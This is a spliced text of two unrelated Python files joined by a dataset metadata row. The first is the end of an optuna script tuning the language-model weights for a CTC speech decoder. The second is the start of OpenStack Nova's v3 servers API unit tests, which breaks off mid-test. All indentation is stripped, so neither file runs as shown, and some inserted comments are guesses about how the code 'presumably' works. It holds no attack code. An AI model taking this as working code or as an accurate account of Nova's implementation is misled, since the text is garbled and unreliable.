self.decoder = BeamCTCDecoder(
labels=self.labels,
lm_path=hydra.utils.to_absolute_path(self.cfg.lm_path),
beam_width=self.cfg.beam_width,
num_processes=self.cfg.num_workers,
blank_index=self.labels.index('_')
)
self.target_decoder = GreedyDecoder(
labels=self.labels,
blank_index=self.labels.index('_')
)
test_dataset = SpectrogramDataset(
audio_conf=self.cfg.spect_cfg,
input_path=hydra.utils.to_absolute_path(cfg.test_path),
labels=self.labels,
normalize=True
)
self.test_loader = AudioDataLoader(
test_dataset,
batch_size=self.cfg.batch_size,
num_workers=self.cfg.num_workers
)
def __call__(self, trial):
alpha = trial.suggest_uniform('alpha', self.cfg.alpha_from, self.cfg.alpha_to)
beta = trial.suggest_uniform('beta', self.cfg.beta_from, self.cfg.beta_to)
self.decoder._decoder.reset_params(alpha, beta)
wer, cer = run_evaluation(
test_loader=self.test_loader,
device=self.device,
model=self.model,
decoder=self.decoder,
target_decoder=self.target_decoder,
precision=self.cfg.precision
)
return cer if self.cfg.is_character_based else wer
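# Note: in CTC beam-search decoding, alpha scales the language-model score
# and beta acts as a word-insertion bonus; optuna samples both within the
# configured ranges and minimizes the returned CER (or WER).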
@hydra.main(config_name="config")
def main(cfg: OptimizerConfig) -> None:
study = optuna.create_study()
study.optimize(Objective(cfg),
n_trials=cfg.n_trials,
n_jobs=cfg.n_jobs,
show_progress_bar=True)
print(f"Best Params\n"
f"alpha: {study.best_params['alpha']}\n"
f"beta: {study.best_params['beta']}\n"
f"{'cer' if cfg.is_character_based else 'wer'}: {study.best_value}")
if __name__ == "__main__":
main()
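# Hedged invocation sketch (hydra parses key=value overrides from the
# command line; the paths below are placeholders):
#
# python search_lm_params.py model_path=models/deepspeech_final.ckpt \
#     test_path=data/test_manifest.json lm_path=lm.binary n_trials=100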
| mit | 8,604,702,044,512,136,000 | 32.327103 | 86 | 0.618059 | false |
jumpstarter-io/nova | nova/tests/api/openstack/compute/plugins/v3/test_servers.py | 1 | 134728 | # Copyright 2010-2011 OpenStack Foundation
# Copyright 2011 Piston Cloud Computing, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import contextlib
import copy
import datetime
import uuid
import iso8601
import mock
import mox
from oslo.config import cfg
import six.moves.urllib.parse as urlparse
import testtools
import webob
from nova.api.openstack import compute
from nova.api.openstack.compute import plugins
from nova.api.openstack.compute.plugins.v3 import access_ips
from nova.api.openstack.compute.plugins.v3 import ips
from nova.api.openstack.compute.plugins.v3 import keypairs
from nova.api.openstack.compute.plugins.v3 import servers
from nova.api.openstack.compute.schemas.v3 import keypairs as keypairs_schema
from nova.api.openstack.compute.schemas.v3 import servers as servers_schema
from nova.api.openstack.compute import views
from nova.api.openstack import extensions
from nova.compute import api as compute_api
from nova.compute import flavors
from nova.compute import task_states
from nova.compute import vm_states
from nova import context
from nova import db
from nova.db.sqlalchemy import models
from nova import exception
from nova.i18n import _
from nova.image import glance
from nova.network import manager
from nova.network.neutronv2 import api as neutron_api
from nova import objects
from nova.objects import instance as instance_obj
from nova.openstack.common import jsonutils
from nova.openstack.common import policy as common_policy
from nova.openstack.common import timeutils
from nova import policy
from nova import test
from nova.tests.api.openstack import fakes
from nova.tests import fake_instance
from nova.tests import fake_network
from nova.tests.image import fake
from nova.tests import matchers
from nova import utils as nova_utils
CONF = cfg.CONF
CONF.import_opt('password_length', 'nova.utils')
FAKE_UUID = fakes.FAKE_UUID
INSTANCE_IDS = {FAKE_UUID: 1}
FIELDS = instance_obj.INSTANCE_DEFAULT_FIELDS
def fake_gen_uuid():
return FAKE_UUID
def return_servers_empty(context, *args, **kwargs):
return []
def instance_update_and_get_original(context, instance_uuid, values,
update_cells=True,
columns_to_join=None,
):
inst = fakes.stub_instance(INSTANCE_IDS.get(instance_uuid),
name=values.get('display_name'))
inst = dict(inst, **values)
return (inst, inst)
def instance_update(context, instance_uuid, values, update_cells=True):
inst = fakes.stub_instance(INSTANCE_IDS.get(instance_uuid),
name=values.get('display_name'))
inst = dict(inst, **values)
return inst
def fake_compute_api(cls, req, id):
return True
def fake_start_stop_not_ready(self, context, instance):
raise exception.InstanceNotReady(instance_id=instance["uuid"])
def fake_start_stop_invalid_state(self, context, instance):
raise exception.InstanceInvalidState(
instance_uuid=instance['uuid'], attr='fake_attr',
method='fake_method', state='fake_state')
def fake_instance_get_by_uuid_not_found(context, uuid,
columns_to_join, use_slave=False):
raise exception.InstanceNotFound(instance_id=uuid)
class MockSetAdminPassword(object):
def __init__(self):
self.instance_id = None
self.password = None
def __call__(self, context, instance_id, password):
self.instance_id = instance_id
self.password = password
class Base64ValidationTest(test.TestCase):
def setUp(self):
super(Base64ValidationTest, self).setUp()
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers.ServersController(extension_info=ext_info)
def test_decode_base64(self):
value = "A random string"
result = self.controller._decode_base64(base64.b64encode(value))
self.assertEqual(result, value)
def test_decode_base64_binary(self):
value = "\x00\x12\x75\x99"
result = self.controller._decode_base64(base64.b64encode(value))
self.assertEqual(result, value)
def test_decode_base64_whitespace(self):
value = "A random string"
encoded = base64.b64encode(value)
white = "\n \n%s\t%s\n" % (encoded[:2], encoded[2:])
result = self.controller._decode_base64(white)
self.assertEqual(result, value)
def test_decode_base64_invalid(self):
invalid = "A random string"
result = self.controller._decode_base64(invalid)
self.assertIsNone(result)
def test_decode_base64_illegal_bytes(self):
value = "A random string"
encoded = base64.b64encode(value)
white = ">\x01%s*%s()" % (encoded[:2], encoded[2:])
result = self.controller._decode_base64(white)
self.assertIsNone(result)
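# For reference, the controller helper exercised above presumably looks
# something like this sketch (the real implementation lives in the servers
# controller; the exact regex and padding handling may differ):
#
# def _decode_base64(self, data):
#     data = re.sub(r'\s', '', data)
#     if len(data) % 4 or not re.match(r'^[A-Za-z0-9+/]*={0,2}$', data):
#         return None
#     return base64.b64decode(data)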
class NeutronV2Subclass(neutron_api.API):
"""Used to ensure that API handles subclasses properly."""
pass
class ControllerTest(test.TestCase):
def setUp(self):
super(ControllerTest, self).setUp()
self.flags(verbose=True, use_ipv6=False)
fakes.stub_out_rate_limiting(self.stubs)
fakes.stub_out_key_pair_funcs(self.stubs)
fake.stub_out_image_service(self.stubs)
return_server = fakes.fake_instance_get()
return_servers = fakes.fake_instance_get_all_by_filters()
self.stubs.Set(db, 'instance_get_all_by_filters',
return_servers)
self.stubs.Set(db, 'instance_get_by_uuid',
return_server)
self.stubs.Set(db, 'instance_update_and_get_original',
instance_update_and_get_original)
ext_info = plugins.LoadedExtensionInfo()
self.controller = servers.ServersController(extension_info=ext_info)
self.ips_controller = ips.IPsController()
policy.reset()
policy.init()
fake_network.stub_out_nw_api_get_instance_nw_info(self.stubs)
class ServersControllerTest(ControllerTest):
def setUp(self):
super(ServersControllerTest, self).setUp()
CONF.set_override('host', 'localhost', group='glance')
def test_requested_networks_prefix(self):
uuid = 'br-00000000-0000-0000-0000-000000000000'
requested_networks = [{'uuid': uuid}]
res = self.controller._get_requested_networks(requested_networks)
self.assertIn((uuid, None), res.as_tuples())
def test_requested_networks_neutronv2_enabled_with_port(self):
self.flags(network_api_class='nova.network.neutronv2.api.API')
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'port': port}]
res = self.controller._get_requested_networks(requested_networks)
self.assertEqual([(None, None, port)], res.as_tuples())
def test_requested_networks_neutronv2_enabled_with_network(self):
self.flags(network_api_class='nova.network.neutronv2.api.API')
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
requested_networks = [{'uuid': network}]
res = self.controller._get_requested_networks(requested_networks)
self.assertEqual([(network, None, None)], res.as_tuples())
def test_requested_networks_neutronv2_enabled_with_network_and_port(self):
self.flags(network_api_class='nova.network.neutronv2.api.API')
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network, 'port': port}]
res = self.controller._get_requested_networks(requested_networks)
self.assertEqual([(None, None, port)], res.as_tuples())
def test_requested_networks_neutronv2_enabled_conflict_on_fixed_ip(self):
self.flags(network_api_class='nova.network.neutronv2.api.API')
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
addr = '10.0.0.1'
requested_networks = [{'uuid': network,
'fixed_ip': addr,
'port': port}]
self.assertRaises(
webob.exc.HTTPBadRequest,
self.controller._get_requested_networks,
requested_networks)
def test_requested_networks_neutronv2_disabled_with_port(self):
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'port': port}]
self.assertRaises(
webob.exc.HTTPBadRequest,
self.controller._get_requested_networks,
requested_networks)
def test_requested_networks_api_enabled_with_v2_subclass(self):
self.flags(network_api_class='nova.network.neutronv2.api.API')
network = 'aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa'
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'uuid': network, 'port': port}]
res = self.controller._get_requested_networks(requested_networks)
self.assertEqual([(None, None, port)], res.as_tuples())
def test_requested_networks_neutronv2_subclass_with_port(self):
cls = 'nova.tests.api.openstack.compute.test_servers.NeutronV2Subclass'
self.flags(network_api_class=cls)
port = 'eeeeeeee-eeee-eeee-eeee-eeeeeeeeeeee'
requested_networks = [{'port': port}]
res = self.controller._get_requested_networks(requested_networks)
self.assertEqual([(None, None, port)], res.as_tuples())
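# Note on the as_tuples() assertions above: the tuple arity reflects the
# NetworkRequest representation in use -- plain nova-network requests
# collapse to (network_id, fixed_ip) pairs, while neutron-style requests
# carry (network_id, fixed_ip, port_id) triples.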
def test_get_server_by_uuid(self):
req = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
res_dict = self.controller.show(req, FAKE_UUID)
self.assertEqual(res_dict['server']['id'], FAKE_UUID)
def test_get_server_joins_pci_devices(self):
self.expected_attrs = None
def fake_get(_self, *args, **kwargs):
self.expected_attrs = kwargs['expected_attrs']
ctxt = context.RequestContext('fake', 'fake')
return fake_instance.fake_instance_obj(ctxt)
self.stubs.Set(compute_api.API, 'get', fake_get)
req = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
self.controller.show(req, FAKE_UUID)
self.assertIn('pci_devices', self.expected_attrs)
def test_unique_host_id(self):
"""Create two servers with the same host and different
project_ids and check that the host_id's are unique.
"""
def return_instance_with_host(self, *args, **kwargs):
project_id = str(uuid.uuid4())
return fakes.stub_instance(id=1, uuid=FAKE_UUID,
project_id=project_id,
host='fake_host')
self.stubs.Set(db, 'instance_get_by_uuid',
return_instance_with_host)
self.stubs.Set(db, 'instance_get',
return_instance_with_host)
req = fakes.HTTPRequestV3.blank('/servers/%s' % FAKE_UUID)
server1 = self.controller.show(req, FAKE_UUID)
server2 = self.controller.show(req, FAKE_UUID)
self.assertNotEqual(server1['server']['hostId'],
server2['server']['hostId'])
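# (hostId is derived by hashing the compute host together with the tenant's
# project_id, so two tenants on the same host see distinct, non-reversible
# hostIds -- which is the property this test relies on.)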
def _get_server_data_dict(self, uuid, image_bookmark, flavor_bookmark,
status="ACTIVE", progress=100):
return {
"server": {
"id": uuid,
"user_id": "fake_user",
"tenant_id": "fake_project",
"updated": "2010-11-11T11:00:00Z",
"created": "2010-10-10T12:00:00Z",
"progress": progress,
"name": "server1",
"status": status,
"hostId": '',
"image": {
"id": "10",
"links": [
{
"rel": "bookmark",
"href": image_bookmark,
},
],
},
"flavor": {
"id": "1",
"links": [
{
"rel": "bookmark",
"href": flavor_bookmark,
},
],
},
"addresses": {
'test1': [
{'version': 4, 'addr': '192.168.1.100',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 6, 'addr': '2001:db8:0:1::1',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'}
]
},
"metadata": {
"seq": "1",
},
"links": [
{
"rel": "self",
"href": "http://localhost/v3/servers/%s" % uuid,
},
{
"rel": "bookmark",
"href": "http://localhost/servers/%s" % uuid,
},
],
}
}
def test_get_server_by_id(self):
self.flags(use_ipv6=True)
image_bookmark = "http://localhost/images/10"
flavor_bookmark = "http://localhost/flavors/1"
uuid = FAKE_UUID
req = fakes.HTTPRequestV3.blank('/servers/%s' % uuid)
res_dict = self.controller.show(req, uuid)
expected_server = self._get_server_data_dict(uuid,
image_bookmark,
flavor_bookmark,
status="BUILD",
progress=0)
self.assertThat(res_dict, matchers.DictMatches(expected_server))
def test_get_server_with_active_status_by_id(self):
image_bookmark = "http://localhost/images/10"
flavor_bookmark = "http://localhost/flavors/1"
new_return_server = fakes.fake_instance_get(
vm_state=vm_states.ACTIVE, progress=100)
self.stubs.Set(db, 'instance_get_by_uuid', new_return_server)
uuid = FAKE_UUID
req = fakes.HTTPRequestV3.blank('/servers/%s' % uuid)
res_dict = self.controller.show(req, uuid)
expected_server = self._get_server_data_dict(uuid,
image_bookmark,
flavor_bookmark)
self.assertThat(res_dict, matchers.DictMatches(expected_server))
def test_get_server_with_id_image_ref_by_id(self):
image_ref = "10"
image_bookmark = "http://localhost/images/10"
flavor_id = "1"
flavor_bookmark = "http://localhost/flavors/1"
new_return_server = fakes.fake_instance_get(
vm_state=vm_states.ACTIVE, image_ref=image_ref,
flavor_id=flavor_id, progress=100)
self.stubs.Set(db, 'instance_get_by_uuid', new_return_server)
uuid = FAKE_UUID
req = fakes.HTTPRequestV3.blank('/servers/%s' % uuid)
res_dict = self.controller.show(req, uuid)
expected_server = self._get_server_data_dict(uuid,
image_bookmark,
flavor_bookmark)
self.assertThat(res_dict, matchers.DictMatches(expected_server))
def test_get_server_addresses_from_cache(self):
pub0 = ('172.19.0.1', '172.19.0.2',)
pub1 = ('1.2.3.4',)
pub2 = ('b33f::fdee:ddff:fecc:bbaa',)
priv0 = ('192.168.0.3', '192.168.0.4',)
def _ip(ip):
return {'address': ip, 'type': 'fixed'}
nw_cache = [
{'address': 'aa:aa:aa:aa:aa:aa',
'id': 1,
'network': {'bridge': 'br0',
'id': 1,
'label': 'public',
'subnets': [{'cidr': '172.19.0.0/24',
'ips': [_ip(ip) for ip in pub0]},
{'cidr': '1.2.3.0/16',
'ips': [_ip(ip) for ip in pub1]},
{'cidr': 'b33f::/64',
'ips': [_ip(ip) for ip in pub2]}]}},
{'address': 'bb:bb:bb:bb:bb:bb',
'id': 2,
'network': {'bridge': 'br1',
'id': 2,
'label': 'private',
'subnets': [{'cidr': '192.168.0.0/24',
'ips': [_ip(ip) for ip in priv0]}]}}]
return_server = fakes.fake_instance_get(nw_cache=nw_cache)
self.stubs.Set(db, 'instance_get_by_uuid', return_server)
req = fakes.HTTPRequestV3.blank('/servers/%s/ips' % FAKE_UUID)
res_dict = self.ips_controller.index(req, FAKE_UUID)
expected = {
'addresses': {
'private': [
{'version': 4, 'addr': '192.168.0.3',
'type': 'fixed', 'mac_addr': 'bb:bb:bb:bb:bb:bb'},
{'version': 4, 'addr': '192.168.0.4',
'type': 'fixed', 'mac_addr': 'bb:bb:bb:bb:bb:bb'},
],
'public': [
{'version': 4, 'addr': '172.19.0.1',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 4, 'addr': '172.19.0.2',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 4, 'addr': '1.2.3.4',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
{'version': 6, 'addr': 'b33f::fdee:ddff:fecc:bbaa',
'type': 'fixed', 'mac_addr': 'aa:aa:aa:aa:aa:aa'},
],
},
}
self.assertThat(res_dict, matchers.DictMatches(expected))
def test_get_server_addresses_nonexistent_network(self):
url = '/v3/servers/%s/ips/network_0' % FAKE_UUID
req = fakes.HTTPRequestV3.blank(url)
self.assertRaises(webob.exc.HTTPNotFound, self.ips_controller.show,
req, FAKE_UUID, 'network_0')
def test_get_server_addresses_nonexistent_server(self):
def fake_instance_get(*args, **kwargs):
raise exception.InstanceNotFound(instance_id='fake')
self.stubs.Set(db, 'instance_get_by_uuid', fake_instance_get)
server_id = str(uuid.uuid4())
req = fakes.HTTPRequestV3.blank('/servers/%s/ips' % server_id)
self.assertRaises(webob.exc.HTTPNotFound,
self.ips_controller.index, req, server_id)
def test_get_server_list_empty(self):
self.stubs.Set(db, 'instance_get_all_by_filters',
return_servers_empty)
req = fakes.HTTPRequestV3.blank('/servers')
res_dict = self.controller.index(req)
num_servers = len(res_dict['servers'])
self.assertEqual(0, num_servers)
def test_get_server_list_with_reservation_id(self):
req = fakes.HTTPRequestV3.blank('/servers?reservation_id=foo')
res_dict = self.controller.index(req)
i = 0
for s in res_dict['servers']:
self.assertEqual(s.get('name'), 'server%d' % (i + 1))
i += 1
def test_get_server_list_with_reservation_id_empty(self):
req = fakes.HTTPRequestV3.blank('/servers/detail?'
'reservation_id=foo')
res_dict = self.controller.detail(req)
i = 0
for s in res_dict['servers']:
self.assertEqual(s.get('name'), 'server%d' % (i + 1))
i += 1
def test_get_server_list_with_reservation_id_details(self):
req = fakes.HTTPRequestV3.blank('/servers/detail?'
'reservation_id=foo')
res_dict = self.controller.detail(req)
i = 0
for s in res_dict['servers']:
self.assertEqual(s.get('name'), 'server%d' % (i + 1))
i += 1
def test_get_server_list(self):
req = fakes.HTTPRequestV3.blank('/servers')
res_dict = self.controller.index(req)
self.assertEqual(len(res_dict['servers']), 5)
for i, s in enumerate(res_dict['servers']):
self.assertEqual(s['id'], fakes.get_fake_uuid(i))
self.assertEqual(s['name'], 'server%d' % (i + 1))
self.assertIsNone(s.get('image', None))
expected_links = [
{
"rel": "self",
"href": "http://localhost/v3/servers/%s" % s['id'],
},
{
"rel": "bookmark",
"href": "http://localhost/servers/%s" % s['id'],
},
]
self.assertEqual(s['links'], expected_links)
def test_get_servers_with_limit(self):
req = fakes.HTTPRequestV3.blank('/servers?limit=3')
res_dict = self.controller.index(req)
servers = res_dict['servers']
self.assertEqual([s['id'] for s in servers],
[fakes.get_fake_uuid(i) for i in xrange(len(servers))])
servers_links = res_dict['servers_links']
self.assertEqual(servers_links[0]['rel'], 'next')
href_parts = urlparse.urlparse(servers_links[0]['href'])
self.assertEqual('/v3/servers', href_parts.path)
params = urlparse.parse_qs(href_parts.query)
expected_params = {'limit': ['3'],
'marker': [fakes.get_fake_uuid(2)]}
self.assertThat(params, matchers.DictMatches(expected_params))
def test_get_servers_with_limit_bad_value(self):
req = fakes.HTTPRequestV3.blank('/servers?limit=aaa')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index, req)
def test_get_server_details_empty(self):
self.stubs.Set(db, 'instance_get_all_by_filters',
return_servers_empty)
req = fakes.HTTPRequestV3.blank('/servers/detail')
res_dict = self.controller.detail(req)
num_servers = len(res_dict['servers'])
self.assertEqual(0, num_servers)
def test_get_server_details_with_limit(self):
req = fakes.HTTPRequestV3.blank('/servers/detail?limit=3')
res = self.controller.detail(req)
servers = res['servers']
self.assertEqual([s['id'] for s in servers],
[fakes.get_fake_uuid(i) for i in xrange(len(servers))])
servers_links = res['servers_links']
self.assertEqual(servers_links[0]['rel'], 'next')
href_parts = urlparse.urlparse(servers_links[0]['href'])
self.assertEqual('/v3/servers/detail', href_parts.path)
params = urlparse.parse_qs(href_parts.query)
expected = {'limit': ['3'], 'marker': [fakes.get_fake_uuid(2)]}
self.assertThat(params, matchers.DictMatches(expected))
def test_get_server_details_with_limit_bad_value(self):
req = fakes.HTTPRequestV3.blank('/servers/detail?limit=aaa')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.detail, req)
def test_get_server_details_with_limit_and_other_params(self):
req = fakes.HTTPRequestV3.blank('/servers/detail'
'?limit=3&blah=2:t')
res = self.controller.detail(req)
servers = res['servers']
self.assertEqual([s['id'] for s in servers],
[fakes.get_fake_uuid(i) for i in xrange(len(servers))])
servers_links = res['servers_links']
self.assertEqual(servers_links[0]['rel'], 'next')
href_parts = urlparse.urlparse(servers_links[0]['href'])
self.assertEqual('/v3/servers/detail', href_parts.path)
params = urlparse.parse_qs(href_parts.query)
expected = {'limit': ['3'], 'blah': ['2:t'],
'marker': [fakes.get_fake_uuid(2)]}
self.assertThat(params, matchers.DictMatches(expected))
def test_get_servers_with_too_big_limit(self):
req = fakes.HTTPRequestV3.blank('/servers?limit=30')
res_dict = self.controller.index(req)
self.assertNotIn('servers_links', res_dict)
def test_get_servers_with_bad_limit(self):
req = fakes.HTTPRequestV3.blank('/servers?limit=asdf')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index, req)
def test_get_servers_with_marker(self):
url = '/v3/servers?marker=%s' % fakes.get_fake_uuid(2)
req = fakes.HTTPRequestV3.blank(url)
servers = self.controller.index(req)['servers']
self.assertEqual([s['name'] for s in servers], ["server4", "server5"])
def test_get_servers_with_limit_and_marker(self):
url = '/v3/servers?limit=2&marker=%s' % fakes.get_fake_uuid(1)
req = fakes.HTTPRequestV3.blank(url)
servers = self.controller.index(req)['servers']
self.assertEqual([s['name'] for s in servers], ['server3', 'server4'])
def test_get_servers_with_bad_marker(self):
req = fakes.HTTPRequestV3.blank('/servers?limit=2&marker=asdf')
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index, req)
def test_get_servers_with_bad_option(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?unknownoption=whee')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_allows_image(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('image', search_opts)
self.assertEqual(search_opts['image'], '12345')
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?image=12345')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_tenant_id_filter_converts_to_project_id_for_admin(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertIsNotNone(filters)
self.assertEqual(filters['project_id'], 'newfake')
self.assertFalse(filters.get('tenant_id'))
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers'
'?all_tenants=1&tenant_id=newfake',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_tenant_id_filter_no_admin_context(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertNotEqual(filters, None)
self.assertEqual(filters['project_id'], 'fake')
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?tenant_id=newfake')
res = self.controller.index(req)
self.assertIn('servers', res)
def test_tenant_id_filter_implies_all_tenants(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertNotEqual(filters, None)
# The project_id assertion checks that the project_id
# filter is set to that specified in the request url and
# not that of the context, verifying that the all_tenants
# flag was enabled
self.assertEqual(filters['project_id'], 'newfake')
self.assertFalse(filters.get('tenant_id'))
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?tenant_id=newfake',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_param_normal(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertNotIn('project_id', filters)
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_param_one(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertNotIn('project_id', filters)
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants=1',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_param_zero(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertNotIn('all_tenants', filters)
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants=0',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_param_false(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertNotIn('all_tenants', filters)
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants=false',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_param_invalid(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None,
expected_attrs=None):
self.assertNotIn('all_tenants', filters)
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants=xxx',
use_admin_context=True)
self.assertRaises(webob.exc.HTTPBadRequest,
self.controller.index, req)
def test_admin_restricted_tenant(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertIsNotNone(filters)
self.assertEqual(filters['project_id'], 'fake')
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers',
use_admin_context=True)
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_pass_policy(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None, use_slave=False,
expected_attrs=None):
self.assertIsNotNone(filters)
self.assertNotIn('project_id', filters)
return [fakes.stub_instance(100)]
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
rules = {
"compute:get_all_tenants":
common_policy.parse_rule("project_id:fake"),
"compute:get_all":
common_policy.parse_rule("project_id:fake"),
}
policy.set_rules(rules)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants=1')
res = self.controller.index(req)
self.assertIn('servers', res)
def test_all_tenants_fail_policy(self):
def fake_get_all(context, filters=None, sort_key=None,
sort_dir='desc', limit=None, marker=None,
columns_to_join=None):
self.assertIsNotNone(filters)
return [fakes.stub_instance(100)]
rules = {
"compute:get_all_tenants":
common_policy.parse_rule("project_id:non_fake"),
"compute:get_all":
common_policy.parse_rule("project_id:fake"),
}
policy.set_rules(rules)
self.stubs.Set(db, 'instance_get_all_by_filters',
fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?all_tenants=1')
self.assertRaises(exception.PolicyNotAuthorized,
self.controller.index, req)
def test_get_servers_allows_flavor(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
self.assertIn('flavor', search_opts)
# flavor is an integer ID
self.assertEqual(search_opts['flavor'], '12345')
db_list = [fakes.stub_instance(100, uuid=server_uuid)]
return instance_obj._make_instance_list(
context, objects.InstanceList(), db_list, FIELDS)
self.stubs.Set(compute_api.API, 'get_all', fake_get_all)
req = fakes.HTTPRequestV3.blank('/servers?flavor=12345')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 1)
self.assertEqual(servers[0]['id'], server_uuid)
def test_get_servers_with_bad_flavor(self):
req = fakes.HTTPRequestV3.blank('/servers?flavor=abcde')
servers = self.controller.index(req)['servers']
self.assertEqual(len(servers), 0)
def test_get_server_details_with_bad_flavor(self):
req = fakes.HTTPRequestV3.blank('/servers?flavor=abcde')
servers = self.controller.detail(req)['servers']
self.assertThat(servers, testtools.matchers.HasLength(0))
def test_get_servers_allows_status(self):
server_uuid = str(uuid.uuid4())
def fake_get_all(compute_self, context, search_opts=None,
sort_key=None, sort_dir='desc',
limit=None, marker=None, want_objects=False,
expected_attrs=None):
self.assertIsNotNone(search_opts)
